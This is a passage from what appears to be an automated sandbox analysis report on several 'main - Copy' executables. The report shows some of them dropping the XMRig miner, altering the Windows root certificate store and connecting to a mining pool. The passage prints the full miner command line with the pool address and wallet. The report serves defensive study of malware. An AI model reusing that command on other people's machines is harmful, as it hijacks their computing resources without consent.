ebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
NL 23.62.61.114:443 www.bing.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 114.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 65.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 213.143.182.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/3428-14-0x0000016AD7E00000-0x0000016AD7E20000-memory.dmp

memory/3428-15-0x0000016AD9570000-0x0000016AD9590000-memory.dmp

memory/3428-16-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-18-0x0000016AD95B0000-0x0000016AD95D0000-memory.dmp

memory/3428-17-0x0000016AD9590000-0x0000016AD95B0000-memory.dmp

memory/3428-19-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-20-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-23-0x0000016AD95B0000-0x0000016AD95D0000-memory.dmp

memory/3428-22-0x0000016AD9590000-0x0000016AD95B0000-memory.dmp

memory/3428-21-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-24-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-25-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-26-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-27-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-28-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-29-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-30-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-31-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-32-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-33-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-34-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-35-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-36-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-37-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-38-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-39-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-40-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-41-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-42-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-43-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-44-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-45-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-46-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-47-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-48-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-49-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-50-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-51-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-52-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-53-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-54-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-55-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-56-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-57-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-58-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-59-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-60-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-61-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-62-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-63-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-64-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-65-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-66-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-67-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-68-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-69-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-70-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-71-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-72-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-73-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-74-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-75-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-76-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-77-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-78-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-79-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-80-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-81-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

memory/3428-82-0x00007FF74FCB0000-0x00007FF7507B3000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:30

Platform

win10v2004-20240611-en

Max time kernel

1794s

Max time network

1788s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 65.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 225.162.46.104.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/4776-14-0x000001FEEE690000-0x000001FEEE6B0000-memory.dmp

memory/4776-15-0x000001FEEE6E0000-0x000001FEEE700000-memory.dmp

memory/4776-16-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-18-0x000001FF82960000-0x000001FF82980000-memory.dmp

memory/4776-17-0x000001FF82730000-0x000001FF82750000-memory.dmp

memory/4776-19-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-20-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-23-0x000001FF82960000-0x000001FF82980000-memory.dmp

memory/4776-22-0x000001FF82730000-0x000001FF82750000-memory.dmp

memory/4776-21-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-24-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-25-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-26-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-27-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-28-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-29-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-30-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-31-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-32-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-33-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-34-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-35-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-36-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-37-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-38-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-39-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-40-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-41-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-42-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-43-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-44-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-45-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-46-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-47-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-48-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-49-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-50-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-51-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-52-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-53-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-54-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-55-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-56-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-57-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-58-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-59-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-60-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-61-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-62-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-63-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-64-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-65-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-66-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-67-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-68-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-69-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-70-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-71-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-72-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-73-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-74-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-75-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-76-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-77-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-78-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-79-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-80-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-81-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

memory/4776-82-0x00007FF6EF0E0000-0x00007FF6EFBE3000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:30

Platform

win10v2004-20240508-en

Max time kernel

1569s

Max time network

1581s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:30

Platform

win10v2004-20240508-en

Max time kernel

1766s

Max time network

1781s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:49

Platform

win10v2004-20240611-en

Max time kernel

1793s

Max time network

1794s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
